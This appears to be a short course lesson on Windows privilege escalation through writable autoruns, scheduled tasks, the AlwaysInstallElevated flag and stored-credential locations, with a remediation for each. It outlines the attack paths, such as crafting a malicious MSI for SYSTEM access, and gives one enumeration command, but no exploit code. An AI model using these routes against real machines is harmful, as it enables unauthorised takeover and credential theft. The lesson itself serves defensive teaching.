Privilege Escalation · intermediate · ~11 min
Recognise registry-autorun, scheduled-task, and installer-based escalations.
Writable HKLM autorun keys/binaries, scheduled tasks running writable scripts, and AlwaysInstallElevated (any user installs MSIs as SYSTEM) all escalate. Stored credentials (Credential Manager, autologon, Unattend.xml, histories) are harvested too. Fixes: lock ACLs, never set AlwaysInstallElevated, purge stored secrets.
These configuration-only escalations (especially AlwaysInstallElevated and writable autoruns/tasks) yield SYSTEM with no exploit, and stored-credential hunting frequently shortcuts the whole process. They're standard WinPEAS findings.
Autorun. Writable HKLM Run key/binary → code at boot/logon privilege. Scheduled tasks. Writable task target = run as task's user. AlwaysInstallElevated. Both keys set → MSI as SYSTEM. Stored creds. Credential Manager, autologon, Unattend.xml, histories. Fix. ACLs, no AIE, purge secrets.
More Windows escalation routes, all variations of "something privileged runs code you can influence".
Programs launched from HKLM\...\Run (and similar) start with the privileges of whoever the autorun runs as. If you can write an HKLM autorun key, or the binary one points to is writable, your code runs at that privilege (often admin/SYSTEM at boot/logon).
Like cron on Linux: a task running as a privileged user that executes a writable script/binary, or one you can reconfigure, runs your code as that user. Enumerate with schtasks /query /fo LIST /v.
A pair of registry flags (HKLM + HKCU ...\Installer\AlwaysInstallElevated = 1) that let any user install MSI packages as SYSTEM. If both are set, craft a malicious MSI → instant SYSTEM. A pure misconfiguration, no exploit. Check both keys.
Windows hides credentials in several places a privesc check harvests: the Credential Manager, autologon settings in the registry (winlogon), unattended-install files (Unattend.xml, sysprep.inf), and saved RDP/PowerShell-history secrets.
Lock down HKLM autorun and task binary ACLs; never set AlwaysInstallElevated; clear credentials from unattend files, registry, and history; use a credential vault.
Windows escalation also flows through writable autoruns and scheduled tasks, the AlwaysInstallElevated MSI flag, and harvested stored credentials — mostly pure misconfigurations. Defenses are ACL hygiene, disabling AIE, and removing stored secrets.